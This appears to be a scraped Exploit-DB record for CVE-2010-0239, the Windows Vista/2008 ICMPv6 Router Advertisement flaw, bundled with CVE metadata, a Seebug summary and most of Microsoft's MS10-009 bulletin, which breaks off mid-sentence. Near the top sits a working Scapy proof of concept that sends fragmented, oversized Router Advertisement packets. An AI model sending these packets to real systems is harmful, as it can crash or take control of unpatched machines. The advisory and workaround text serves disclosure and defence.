Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability
2010-02-09T00:00:00
ID EDB-ID:33594 Type exploitdb Reporter Sumit Gwalani Modified 2010-02-09T00:00:00
Description
Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability. CVE-2010-0239. Remote exploit for windows platform
source: http://www.securityfocus.com/bid/38061/info
Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
v6_dst = "<IPv6 address>"
mac_dst = "<Mac address>"
pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)
l=fragment6(pkt, 1500)
for p in l:
sendp(Ether(dst=mac_dst)/p, iface="eth0")
{"id": "EDB-ID:33594", "hash": "1689de7e8239a51f53c32eda19d75726", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability", "description": "Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability. CVE-2010-0239. Remote exploit for windows platform", "published": "2010-02-09T00:00:00", "modified": "2010-02-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/33594/", "reporter": "Sumit Gwalani", "references": [], "cvelist": ["CVE-2010-0239"], "lastseen": "2016-02-03T19:30:42", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 8.6, "vector": "NONE", "modified": "2016-02-03T19:30:42"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-0239"]}, {"type": "seebug", "idList": ["SSV:19152"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23198", "SECURITYVULNS:VULN:10601"]}, {"type": "openvas", "idList": ["OPENVAS:801479", "OPENVAS:1361412562310801479"]}, {"type": "nessus", "idList": ["SMB_NT_MS10-009.NASL", "WIN_SERVER_2008_NTLM_PCI.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:F9D20D7B330A431D721F16F5223B236A"]}], "modified": "2016-02-03T19:30:42"}, "vulnersScore": 8.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/33594/", "sourceData": "source: http://www.securityfocus.com/bid/38061/info\r\n\r\nMicrosoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.\r\n\r\nAn attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. \r\n\r\n\r\nv6_dst = \"<IPv6 address>\"\r\n\r\nmac_dst = \"<Mac address>\"\r\n\r\npkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix=\"2001::\") / Raw(load='A'*2008)\r\n\r\nl=fragment6(pkt, 1500)\r\n\r\nfor p in l:\r\nsendp(Ether(dst=mac_dst)/p, iface=\"eth0\")", "osvdbidlist": ["62250"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:10:26", "bulletinFamily": "NVD", "description": "The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka \"ICMPv6 Router Advertisement Vulnerability.\"", "modified": "2018-10-12T21:56:00", "id": "CVE-2010-0239", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0239", "published": "2010-02-10T18:30:00", "title": "CVE-2010-0239", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:14:16", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 38061\r\nCVE ID: CVE-2010-0239\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nWindows TCP/IP\u6808\u5728\u5904\u7406\u7279\u5236\u7684ICMPv6\u8def\u7531\u64ad\u53d1\u62a5\u6587\u65f6\u6ca1\u6709\u6267\u884c\u5145\u5206\u7684\u8fb9\u754c\u68c0\u67e5\uff0c\u533f\u540d\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5411\u542f\u7528\u4e86IPv6\u7684\u8ba1\u7b97\u673a\u53d1\u9001\u7279\u5236\u7684ICMPv6\u62a5\u6587\u6765\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\n\nMicrosoft Windows Vista SP2\r\nMicrosoft Windows Vista SP1\r\nMicrosoft Windows Vista\r\nMicrosoft Windows Server 2008 SP2\r\nMicrosoft Windows Server 2008\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u7528\u201c\u6838\u5fc3\u7f51\u7edc \u2013 \u8def\u7531\u5668\u64ad\u53d1\uff08ICMPv6-In\uff09\u201d\u5165\u7ad9\u9632\u706b\u5899\u89c4\u5219\uff0c\u4ece\u63d0\u5347\u7684\u547d\u4ee4\u63d0\u793a\u7b26\u5904\u8fd0\u884c\u4e0b\u5217\u547d\u4ee4\uff1a\r\n\r\nnetsh firewall set rule name="Core Networking \u2013 Router Advertisement (ICMPv6-In)" dir=in new enable=No\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-009\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-009\uff1aVulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/Bulletin/MS10-009.mspx?pf=true", "modified": "2010-02-20T00:00:00", "published": "2010-02-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19152", "id": "SSV:19152", "title": "Microsoft Windows ICMPv6\u8def\u7531\u64ad\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff08MS10-009\uff09", "type": "seebug", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "securityvulns": [{"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS10-009 - Critical\r\nVulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)\r\nPublished: February 09, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves four privately reported vulnerabilities in Microsoft Windows. The most severe of these vulnerabilities could allow remote code execution if specially crafted packets are sent to a computer with IPv6 enabled. An attacker could try to exploit the vulnerability by creating specially crafted ICMPv6 packets and sending the packets to a system with IPv6 enabled. This vulnerability may only be exploited if the attacker is on-link.\r\n\r\nThis security update is rated Critical for Windows Vista and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerabilities by changing the way Windows TCP/IP performs bounds checking and other packet handling operations. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software \r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN article, Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.\r\n\r\nNon-Affected Software\r\nOperating System\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\r\nWindows Server 2003 Service Pack 2\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\r\nWindows 7 for 32-bit Systems\r\n\r\nWindows 7 for x64-based Systems\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the February bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tICMPv6 Router Advertisement Vulnerability - CVE-2010-0239\tHeader MDL Fragmentation Vulnerability \u2013 CVE-2010-0240\tICMPv6 Route Information Vulnerability - CVE-2010-0241\tTCP/IP Selective Acknowledgement Vulnerability \u2013 CVE-2010-0242\tAggregate Severity Rating\r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN article, Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nICMPv6 Router Advertisement Vulnerability - CVE-2010-0239\r\n\r\nA remote code execution vulnerability exists in the Windows TCP/IP stack due to insufficient bounds checking when processing specially crafted ICMPv6 Router Advertisement packets. An anonymous attacker could exploit the vulnerability by sending specially crafted ICMPv6 Router Advertisement packets to a computer with IPv6 enabled. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0239.\r\n\t\r\nMitigating Factors for ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239\r\n\r\nMicrosoft has not identified any mitigating factors for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the "Core Networking \u2013 Router Advertisement (ICMPv6-In)" inbound firewall rule\r\n\r\nTo disable this firewall rule, run the following command from an elevated command prompt:\r\n\r\nnetsh firewall set rule name="Core Networking \u2013 Router Advertisement (ICMPv6-In)" dir=in new enable=No\r\n\r\nImpact of workaround. ICMPv6 router advertisements will be blocked. This could adversely impact IPv6 functionality in common deployment scenarios, where router discovery protocol is used for host configuration.\r\n\r\nHow to undo the workaround.\r\n\r\nTo re-enable this firewall rule, run the following command from an elevated command prompt:\r\n\r\nnetsh firewall set rule name="Core Networking \u2013 Router Advertisement (ICMPv6-In)" dir=in new enable=Yes\r\n\r\nTop of sectionTop of section\r\n\t\r\nFAQ for ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated privileges on vulnerable systems. An attacker could then install programs or view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Windows TCP/IP stack not performing the appropriate level of bounds checking on specially crafted ICMPv6 Router Advertisement packets.\r\n\r\nWhat is TCP/IP? \r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the TechNet article, Overview of networking and TCP/IP.\r\n\r\nWhat is IPv6? \r\nInternet Protocol version 6 (IPv6), a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. IPv6 is designed to solve many of the problems of the current version of IP (known as IPv4) such as address depletion, security, autoconfiguration, and extensibility. To learn more about IPv6, please see the TechNet site, FAQ for IPv6.\r\n\r\nWhat are Router Advertisements? \r\nRouter Advertisements allow routers to instruct hosts how to perform Address Autoconfiguration. For example, routers can specify whether hosts should use DHCPv6 and/or autonomous (stateless) address configuration. Routers advertise their presence together with various link and Internet parameters either periodically, or in response to a Router Solicitation message. Router Advertisements contain prefixes that are used for determining whether another address shares the same link (on-link determination) and/or address configuration, a suggested hop limit value, etc. For more information about Router Advertisements and Neighbor Discovery in IPv6, see RFC 4861.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could try to exploit the vulnerability by creating specially crafted ICMPv6 packets and sending the packets to a system with IPv6 enabled. This vulnerability may only be exploited if the attacker is on-link. Tunneling protocols, such as ISATAP, may effectively allow attackers to deliver the corrupted packet to the target machine even if the attacker is not present on the same physical link.\r\n\r\nWhen is an attacker considered "on-link"? \r\nFor purposes of this vulnerability, an attacker is considered on-link if they are on the same physical or virtual link and are able to send a valid neighbor discovery message to the target host. An example of a virtual link is one that occurs via an ISATAP tunnel. For more information about on-link addresses and Neighbor Discovery in IPv6, see RFC 4861.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll operating systems with the IPv6 features enabled are at risk from this vulnerability. By default all the supported features for IPv6 are enabled in Windows Vista and Windows Server 2008.\r\n\r\nWhat does the update do? \r\nThe update addresses this vulnerability by changing the manner in which the Windows TCP/IP stack performs bounds checking on specially crafted ICMPv6 Router Advertisement packets.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nHeader MDL Fragmentation Vulnerability - CVE-2010-0240\r\n\r\nA remote code execution vulnerability exists in the Windows TCP/IP stack due to the manner in which the TCP/IP stack handles specially crafted Encapsulating Security Payloads (ESP) over UDP datagram fragments when running a custom network driver. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0240.\r\n\t\r\nMitigating Factors for Header MDL Fragmentation Vulnerability - CVE-2010-0240\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nThis vulnerability only impacts Windows systems if they have installed a custom network driver that splits the UDP header into multiple MDLs. Microsoft is not aware of any driver that takes this action.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Header MDL Fragmentation Vulnerability - CVE-2010-0240\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nEnable advanced TCP/IP filtering on systems that support this feature\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, enable advanced TCP/IP filtering on systems that support this feature. You can enable advanced TCP/IP filtering to block all unsolicited inbound traffic. For more information about how to configure TCP/IP filtering, see Microsoft Knowledge Base Article 309798.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Header MDL Fragmentation Vulnerability - CVE-2010-0240\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated privileges on vulnerable systems. An attacker could then install programs or view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Windows TCP/IP stack not handling specially crafted IP datagram fragments when running a custom network driver.\r\n\r\nWhat is TCP/IP? \r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the TechNet article, Overview of networking and TCP/IP.\r\n\r\nWhat is an Encapsulating Security Payload (ESP)? \r\nEncapsulating Security Payload (ESP) provides confidentiality (in addition to authentication, integrity, and anti-replay protection) for the IP payload. ESP in transport mode does not sign the entire packet. Only the IP payload (not the IP header) is protected. ESP can be used alone or in combination with Authentication Header (AH).\r\n\r\nWhat is a Memory Descriptor List (MDL)? \r\nA memory descriptor list (MDL) is a system-defined structure that describes a buffer by a set of physical addresses. A driver that performs direct I/O receives a pointer to an MDL from the I/O manager, and reads and writes data through the MDL. Some drivers also use MDLs when they perform direct I/O to satisfy a device I/O control request. For more information about MDLs, see the Windows Hardware Developer Central article, What is really in that MDL?\r\n\r\nDoes this attack require the UDP traffic to be fragmented? \r\nNo. This attack does not rely on fragmented network traffic. Instead, the fragmentation involved requires the network driver on the target system to fragment the UDP header into separate MDLs.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could try to exploit the vulnerability by creating specially crafted IP datagram fragments and sending the packets to a system with a custom network driver installed.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll affected operating systems may be at risk from this vulnerability if they have installed a custom network driver that splits the UDP header into multiple MDLs. No network drivers that ship with Windows can take this action. Microsoft is not aware of any network driver that can take this action.\r\n\r\nWhat does the update do? \r\nThe update addresses this vulnerability by changing the manner in which the Windows TCP/IP stack handles specially crafted ESP over UDP datagrams.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nICMPv6 Route Information Vulnerability - CVE-2010-0241\r\n\r\nA remote code execution vulnerability exists in the Windows TCP/IP stack due to insufficient bounds checking when processing specially crafted ICMPv6 Route Information packets. An anonymous attacker could exploit the vulnerability by sending specially crafted ICMPv6 Route Information packets to a computer with IPv6 enabled. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0241.\r\n\t\r\nMitigating Factors for ICMPv6 Route Information Vulnerability - CVE-2010-0241\r\n\r\nMicrosoft has not identified any mitigating factors for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for ICMPv6 Route Information Vulnerability - CVE-2010-0241\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the "Core Networking \u2013 Router Advertisement (ICMPv6-In)" inbound firewall rule\r\n\r\nTo disable this firewall rule, run the following command from an elevated command prompt:\r\n\r\nnetsh firewall set rule name="Core Networking \u2013 Router Advertisement (ICMPv6-In)" dir=in new enable=No\r\n\r\nImpact of workaround. ICMPv6 router advertisements will be blocked. This could adversely impact IPv6 functionality in common deployment scenarios, where router discovery protocol is used for host configuration.\r\n\r\nHow to undo the workaround.\r\n\r\nTo re-enable this firewall rule, run the following command from an elevated command prompt:\r\n\r\nnetsh firewall set rule name="Core Networking \u2013 Router Advertisement (ICMPv6-In)" dir=in new enable=Yes\r\n\r\nTop of sectionTop of section\r\n\t\r\nFAQ for ICMPv6 Route Information Vulnerability - CVE-2010-0241\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated privileges on vulnerable systems. An attacker could then install programs or view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Windows TCP/IP stack not performing the appropriate level of bounds checking on specially crafted ICMPv6 Route Information packets.\r\n\r\nWhat is TCP/IP? \r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the TechNet article, Overview of networking and TCP/IP.\r\n\r\nWhat is IPv6? \r\nInternet Protocol version 6 (IPv6), a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. IPv6 is designed to solve many of the problems of the current version of IP (known as IPv4) such as address depletion, security, auto-configuration, and extensibility. To learn more about IPv6, please see the TechNet site, FAQ for IPv6.\r\n\r\nWhat are Router Advertisements? \r\nRouter Advertisements allow routers to instruct hosts how to perform Address Autoconfiguration. For example, routers can specify whether hosts should use DHCPv6 and/or autonomous (stateless) address configuration. Routers advertise their presence together with various link and Internet parameters either periodically, or in response to a Router Solicitation message. Router Advertisements contain prefixes that are used for determining whether another address shares the same link (on-link determination) and/or address configuration, a suggested hop limit value, etc. For more information about Router Advertisements and Neighbor Discovery in IPv6, see RFC 4861.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could try to exploit the vulnerability by creating specially crafted ICMPv6 packets and sending the packets to a system with IPv6 enabled. This vulnerability may only be exploited if the attacker is on-link. Tunneling protocols, such as ISATAP, may effectively allow attackers to deliver the corrupted packet to the target machine even if the attacker is not present on the same physical link.\r\n\r\nWhen is an attacker considered "on-link"? \r\nFor purposes of this vulnerability, an attacker is considered on-link if they are on the same physical or virtual link and are able to send a valid neighbor discovery message to the target host. An example of a virtual link is one that occurs via an ISATAP tunnel. For more information about on-link addresses and Neighbor Discovery in IPv6, see RFC 4861.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll operating systems with the IPv6 features enabled are at risk from this vulnerability. By default all the supported features for IPv6 are enabled in Windows Vista and Windows Server 2008.\r\n\r\nWhat does the update do? \r\nThe update addresses this vulnerability by changing the manner in which the Windows TCP/IP stack performs bounds checking on specially crafted ICMPv6 Router Information packets.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nTCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242\r\n\r\nA denial of service vulnerability exists in TCP/IP processing in Microsoft Windows due to an error in the processing of specially crafted TCP packets with a malformed selective acknowledgment (SACK) value. An attacker could exploit the vulnerability by sending the target system a small number of specially crafted packets causing the affected system to stop responding and automatically restart.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0242.\r\n\t\r\nMitigating Factors for TCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242\r\n\r\nMicrosoft has not identified any mitigating factors for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for TCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242\r\n\r\nMicrosoft has not identified any workarounds for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for TCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding. Note that the denial of service vulnerability would not allow an attacker to execute code or 